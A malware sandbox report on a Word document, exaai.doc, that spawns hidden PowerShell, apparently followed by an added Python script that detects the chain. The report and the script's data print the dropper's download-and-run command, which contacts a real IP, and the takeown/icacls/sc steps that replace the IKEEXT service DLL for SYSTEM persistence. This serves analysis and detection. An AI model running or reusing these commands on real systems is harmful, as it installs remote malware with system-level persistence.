VMRay Analyzer Report for Sample #19550
Generated by VMRay Analyzer 2.2.0

Analysis metadata

Sample-ID:      #19550
Job-ID:         #10929
Submission-ID:  #19697
Sample file:    C:\Users\BGC6u8Oy yXGxkR\Desktop\exaai.doc (type: doc; opened by winword.exe)
    MD5     292843976600e8ad2130224d70356bfc
    SHA1    31bad7ea8606e3e6d98692fa9f4b3f18ebb3c809
    SHA256  d5c27308f50a9c6d8ccd01269ca09a7a13e1615945b8047c4e55c610718e317e
Analysis VM:    win7_32_sp1-mso2013: Windows 7, x86 32-bit PAE, 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)
Timeout:        False
Runtime:        136.962 s
VTI database:   version 2.6. The summary VTI score in the extracted report reads "0", which contradicts the 5/5 rule matches listed under "VTI rule matches" below; read the individual matches rather than the summary number.

Behaviour summary

The Word document exaai.doc spawns cmd.exe, which runs a hidden PowerShell (-ep Bypass -w Hidden -noprofile -noexit) that downloads http://213.183.51.187/debug.dll with System.Net.WebClient.DownloadFile and launches it through rundll32.exe with the export name HOK. Note the destination path: the dropper writes to '%temp%debug.dll' with no backslash after %temp%, so the file lands at C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll, that is, a file named "Tempdebug.dll" in AppData\Local, not a file inside Temp\. Any detection or IOC search keyed on "\Temp\" misses it; the report records it as users\bgc6u8oy yxgxkr\appdata\local\tempdebug.dll.

The first rundll32 (PID 2788) records file create and delete events and launches cmd.exe to run iun4816.bat, which hides the dropped DLL (attrib -h -s), delays with "ping 127.0.0.1 -n 3" (a batch-file sleep idiom, and the source of the "resolve host name 127.0.0.1" VTI match) and exits.

A second rundll32 (PID 2932) loads the same DLL with export SSSS. The report lists it as a child of a dllhost.exe COM surrogate (PID 2900, /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}), not of PID 2788, and it runs with working directory C:\Windows\system32\. The report does not identify the COM class behind that CLSID; what is visible is that everything PID 2932 does requires administrator rights. It replaces the service DLL of IKEEXT (IKE and AuthIP IPsec Keying Modules, which runs as LocalSystem inside svchost) in this order:

    net stop /y ikeext
    takeown /F C:\Windows\system32\ikeext.dll
    icacls C:\Windows\system32\ikeext.dll /grant system:F
    icacls C:\Windows\system32\ikeext.dll /grant administrators:F
    (ikeext.dll moved to ikeext32.dll; new ikeext.dll, sensr3.dat and sensr9.dat written to System32)
    sc config ikeext start= auto
    net start ikeext

The outcome is a service-DLL replacement that survives reboot: IKEEXT is set to auto-start and now loads the attacker's ikeext.dll as SYSTEM, with the original kept beside it as ikeext32.dll. The dropper also registers an Add/Remove Programs entry named "CutBat" whose UninstallString is the same "rundll32.exe ...\Tempdebug.dll SSSS" command line, so invoking that uninstaller would run the SSSS export again rather than remove anything the report shows.

Process tree

PIDs, parent PIDs, command lines and working directories are as recorded by the analyzer. Handle-open events, which the raw report repeats dozens of times per process, are omitted.

[2444] winword.exe (parent 1560)
       "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
       cwd C:\Users\BGC6u8Oy yXGxkR\Desktop\ ; opens exaai.doc
  [2616] cmd.exe
         c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK
    [2640] powershell.exe
           powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK
           three TCP connections to 213.183.51.187:80; writes C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll; creates mutex Global\.net clr networking
      [2788] rundll32.exe
             "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK
             file create, modify-properties and delete events
        [3268] cmd.exe
               cmd /c ""C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" "
               reads iun4816.bat; creates and deletes iun4816.tmp; writes to, then deletes, the batch file
          [3296] attrib.exe   ATTRIB -h -s "C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll"
          [3304] ping.exe     Ping 127.0.0.1 -n 3
          [3332] cmd.exe      cmd.exe /c exit

[2900] dllhost.exe (parent 600, not in the tree)  cwd C:\Windows\system32\
       C:\Windows\system32\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}
  [2932] rundll32.exe  cwd C:\Windows\system32\
         "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS
         moves ikeext.dll to ikeext32.dll; creates ikeext.dll, sensr3.dat, sensr9.dat in System32
    [2940] cmd.exe      C:\Windows\system32\cmd.exe /c "net stop /y ikeext"
      [2960] net.exe    net stop /y ikeext
        [2968] net1.exe C:\Windows\system32\net1 stop /y ikeext   (Wrote_To)
    [2976] cmd.exe      C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll"
      [2996] takeown.exe
    [3008] cmd.exe      C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F"
      [3028] icacls.exe
    [3040] cmd.exe      C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F"
      [3060] icacls.exe
    [3072] cmd.exe      C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto"
      [3092] sc.exe     (Wrote_To: service configuration change; the key path is not itemized in the extracted report)
    [3104] cmd.exe      C:\Windows\system32\cmd.exe /c "net start ikeext"
      [3124] net.exe    net start ikeext
        [3132] net1.exe C:\Windows\system32\net1 start ikeext   (Wrote_To)

[0] System Idle Process and [4] System are listed by the analyzer and are not part of the chain.

Files

Paths and hashes are as recorded.

C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll
    downloaded by PID 2640; loaded by rundll32 with exports HOK (PID 2788) and SSSS (PID 2932); hidden by attrib -h -s
    MD5     64b2ac701a0d67da134e13b2efc46900
    SHA1    1bb516d70591a5a0eb55ee71f9f38597f3640b14
    SHA256  f3f55c3df39b85d934121355bed439b53501f996e9b39d4abed14c7fe8081d92

C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat
    run by PID 3268 (child of PID 2788); read, written and deleted during execution
    MD5     9cc8f01a19e5c00ef42c554b2aef38fd
    SHA1    ac464faa791113edc96cc061835dcf5b698d5b01
    SHA256  f7a647b095d8948d42f34958dc73fc9ca569399d81251336a59a1a3dcb6fe908

C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.tmp
    created and deleted by PID 3268; the hashes are those of an empty file
    MD5     d41d8cd98f00b204e9800998ecf8427e
    SHA1    da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

C:\Windows\system32\ikeext32.dll   (Moved_To: rename target of the original service DLL)
    MD5     f95622f161474511b8d80d6b093aa610
    SHA1    691848e306566c63f5dfe1edcca7c7e8882c4caa
    SHA256  f2320e25eb9b4aa9a8366bd3aa23eabebe111a5610d3a62eba47d90427d5bc26

C:\Windows\system32\ikeext.dll   (Moved_From; created and modified by PID 2932: the replacement service DLL)
    MD5     c3217cf9789f2b7a41f8ce54692d18fd
    SHA1    f5bc9b2373201b214b3d0d248c95716023bc0c14
    SHA256  f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de

C:\Windows\system32\sensr9.dat   (created and modified by PID 2932)
    MD5     422a9797a40f1b1c3a72e9674adffedb
    SHA1    92e351c5e1cc5abc36fb003b435acbc018253f56
    SHA256  e002a93f45a9c9577b3f5edd5a018b2d0ad68783db483b77b23cf56016824fac

C:\Windows\system32\sensr3.dat   (created and modified by PID 2932)
    MD5     6317421e5b20c3df65bf66b4ec472187
    SHA1    c6ed48d2daf396178b1840a1877532c429d85cd0
    SHA256  2f64a87596e52aea3579fd696b472480e90c275d1cdef7e6ac44fea8ea8b4be1

C:\Windows\system32\kernel32.dll: opened only. The PowerShell process also reads the standard type and format files under C:\Windows\System32\WindowsPowerShell\v1.0\ (getevent.types.ps1xml, types.ps1xml, diagnostics/wsman/certificate/dotnettypes/filesystem/help/powershellcore/powershelltrace/registry .format.ps1xml) and C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config; these are normal engine start-up reads, not indicators.

Registry

Written:
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat
    szDisplayName    REG_SZ  CutBat
    UninstallString  REG_SZ  C:\Windows\system32\rundll32.exe C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS

Service configuration: sc.exe (PID 3092) and net1.exe (PIDs 2968, 3132) record Wrote_To events for the IKEEXT stop, start-type change and start; the raw report does not itemize the Services key.

Read only (start-up noise, listed for completeness):
HKCU and HKLM\Software\Microsoft\Command Processor (DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun), read once per cmd.exe instance
HKCU\Software\Policies\Microsoft\Windows\System
HKLM\Software\Microsoft\PowerShell, \1, \1\PowerShellEngine (ApplicationBase), \1\ShellIds (PipelineMaxStackSizeMB), \1\ShellIds\Microsoft.PowerShell (path)
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment and HKCU\Environment (PSMODULEPATH)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN (StackVersion)
HKLM\SYSTEM\CurrentControlSet\Services\EventLog and its sources (Application, HardwareEvents, Internet Explorer, Key Management Service, Media Center, OAlerts, Security, System, Windows PowerShell, each with a PowerShell subkey), enumerated repeatedly by the PowerShell engine
HKLM\Software\Microsoft\Windows NT\CurrentVersion (InstallationType)
HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance (Library, IsMultiInstance, First Counter, CategoryOptions, FileMappingSize, Counter Names)
HKCU and HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections and HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (proxy lookup by WebClient)
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters (DefaultTTL, read by ping.exe)

Mutexes and network

Mutex: Global\.net clr networking (created three times by PID 2640; this is the .NET networking stack's own mutex and is the basis of the low-scoring vmray_install_ipc_endpoint match).
Network: TCP connection to 213.183.51.187:80, HTTP request for 213.183.51.187/debug.dll (PID 2640). URI 127.0.0.1 resolved to 127.0.0.1 (ping.exe, PID 3304).

VTI rule matches

Score  Category     Rule                              Detail
4/5    Process      vmray_document_create_process     Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1/5    Process      vmray_install_ipc_endpoint        Create mutex with name "Global\.net clr networking"
4/5    Process      vmray_document_create_process     Create process ""C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK"
5/5    File System  vmray_create_file_in_os_dir       Create file "C:\Windows\system32\sensr9.dat" in the OS directory
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\cmd.exe /c "net stop /y ikeext""
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\net.exe"
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll""
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\takeown.exe"
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F""
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\icacls.exe"
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F""
5/5    File System  vmray_create_file_in_os_dir       Create file "C:\Windows\system32\ikeext32.dll" in the OS directory
5/5    File System  vmray_create_file_in_os_dir       Create file "C:\Windows\system32\sensr3.dat" in the OS directory
5/5    File System  vmray_create_file_in_os_dir       Create file "C:\Windows\system32\ikeext.dll" in the OS directory
5/5    File System  vmray_overwrite_file_in_os_dir    Modify file "C:\Windows\system32\sensr3.dat" in the OS directory
5/5    File System  vmray_overwrite_file_in_os_dir    Modify file "C:\Windows\system32\ikeext.dll" in the OS directory
5/5    File System  vmray_overwrite_file_in_os_dir    Modify file "C:\Windows\system32\sensr9.dat" in the OS directory
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto""
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\sc.exe"
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\cmd.exe /c "net start ikeext""
4/5    Process      vmray_document_create_process     Create process "C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat"
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\attrib.exe"
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\PING.EXE"
3/5    Network      vmray_request_dns_by_name         Resolve host name "127.0.0.1"
4/5    Process      vmray_document_create_process     Create process "C:\Windows\system32\cmd.exe"

The vmray_document_create_process rule fires once per descendant of the document process, so the 4/5 matches are mostly one behaviour counted many times. The matches that carry the weight are the 5/5 file-system hits on System32 (service DLL replacement) and, although it scores only 4/5, the Office-to-PowerShell launch with -ep Bypass -w Hidden and a remote DownloadFile.
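Added example, not part of the VMRay report and not VMRay's code: a small Python triage script that rebuilds the parent/child tree from process-creation records and flags the three behaviours the chain above exhibits (Office spawning a shell, hidden policy-bypassing PowerShell that downloads a file and hands it to rundll32, and a parent whose children re-ACL a System32 DLL and then restart the service of the same name), plus the "\Local\Tempdebug.dll" path quirk. The EVENTS records are constructed from the PIDs and command lines listed in the report; the (pid, ppid, image, cmdline) tuple layout, the rule names, the OFFICE/SHELLS sets and the regular expressions are this example's own assumptions, and rule 3 is written generically so it also fires on other service names and DLLs than ikeext.

```python
"""Process-tree triage for the exaai.doc chain (added example; not VMRay's code).

EVENTS is constructed from the sandbox report's process list. The tuple
layout (pid, ppid, image, command line), the rule names and the regexes
are assumptions of this example, not a VMRay export format.
"""
import re
from collections import defaultdict

# Constructed from the report: (pid, ppid, image, command line).
EVENTS = [
    (2444, 1560, "winword.exe",
     r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"'),
    (2616, 2444, "cmd.exe",
     r"c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c "
     r"IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll',"
     r"'%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK"),
    (2640, 2616, "powershell.exe",
     r"powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c "
     r"IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll',"
     r"'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');"
     r"rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK"),
    (2788, 2640, "rundll32.exe",
     r'"C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK'),
    (2900, 600, "dllhost.exe",
     r"C:\Windows\system32\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}"),
    (2932, 2900, "rundll32.exe",
     r'"C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS'),
    (2940, 2932, "cmd.exe", r'C:\Windows\system32\cmd.exe /c "net stop /y ikeext"'),
    (2976, 2932, "cmd.exe", r'C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll"'),
    (3008, 2932, "cmd.exe", r'C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F"'),
    (3040, 2932, "cmd.exe", r'C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F"'),
    (3072, 2932, "cmd.exe", r'C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto"'),
    (3104, 2932, "cmd.exe", r'C:\Windows\system32\cmd.exe /c "net start ikeext"'),
    (3268, 2788, "cmd.exe", r'cmd /c ""C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" "'),
    (3304, 3268, "ping.exe", "Ping 127.0.0.1 -n 3"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}   # assumed set of document hosts
SHELLS = {"cmd.exe", "powershell.exe"}


def build_tree(events):
    """Index records by pid and collect child pids per parent pid."""
    by_pid = {e[0]: e for e in events}
    children = defaultdict(list)
    for pid, ppid, _image, _cmd in events:
        children[ppid].append(pid)
    return by_pid, children


def office_spawned_shell(events):
    """Rule 1: an Office process is the direct parent of cmd.exe or powershell.exe."""
    by_pid, _ = build_tree(events)
    return [pid for pid, ppid, image, _cmd in events
            if image in SHELLS and by_pid.get(ppid, (0, 0, "", ""))[2] in OFFICE]


# Hidden, policy-bypassing PowerShell that downloads a file and hands it to rundll32.
PS_DOWNLOAD_EXEC = re.compile(
    r"-ep\s+bypass.*-w\s+hidden.*downloadfile\(.*\).*rundll32", re.I | re.S)


def powershell_download_to_rundll32(events):
    """Rule 2: fires on the cmd /k wrapper and on the PowerShell process itself."""
    return [pid for pid, _ppid, image, cmd in events
            if image in SHELLS and PS_DOWNLOAD_EXEC.search(cmd)]


# takeown/icacls against a DLL in System32, and service control naming a service.
SVC_FILE = re.compile(r"\b(?:takeown|icacls)\b.*\\system32\\(\w+)\.dll", re.I)
SVC_CTRL = re.compile(r"\b(?:sc\s+config|net\s+(?:start|stop))\s+(?:/y\s+)?(\w+)", re.I)


def service_dll_tamper(events):
    """Rule 3: one parent whose children re-ACL a System32 DLL and stop/configure/start
    a service with the same base name (the IKEEXT replacement under PID 2932)."""
    by_pid, children = build_tree(events)
    hits = []
    for parent, kids in children.items():
        dlls, svcs = set(), set()
        for kid in kids:
            cmd = by_pid[kid][3]
            m = SVC_FILE.search(cmd)
            if m:
                dlls.add(m.group(1).lower())
            m = SVC_CTRL.search(cmd)
            if m:
                svcs.add(m.group(1).lower())
        hits.extend((parent, name) for name in sorted(dlls & svcs))
    return hits


# %temp% in this chain expands with no trailing backslash, so the payload lands at
# ...\AppData\Local\Tempdebug.dll, outside Temp\. Catch names glued onto "Temp".
MISJOINED_TEMP = re.compile(r"\\AppData\\Local\\Temp(?![\\\s'\"])([\w.]+)", re.I)


def misjoined_temp_paths(events):
    """Rule 4: file names fused onto AppData\\Local\\Temp without a separator."""
    found = {"Temp" + m.group(1) for _pid, _ppid, _image, cmd in events
             for m in MISJOINED_TEMP.finditer(cmd)}
    return sorted(found)


def triage(events):
    """Run all rules and return their hits keyed by rule name."""
    return {
        "office_spawned_shell": office_spawned_shell(events),
        "powershell_download_to_rundll32": powershell_download_to_rundll32(events),
        "service_dll_tamper": service_dll_tamper(events),
        "misjoined_temp_paths": misjoined_temp_paths(events),
    }


if __name__ == "__main__":
    for rule, hits in triage(EVENTS).items():
        print(f"{rule:32s} {hits}")
```

Rules 1 and 3 are structural (they key on parent/child relationships and on a DLL name agreeing with a service name), so they keep firing if the download URL, export names or file names change; rule 4 exists only because of the missing backslash in this sample's %temp% usage and is the kind of sample-specific quirk worth encoding beside the generic rules, since a search for "\Temp\debug.dll" on a live host would come back empty.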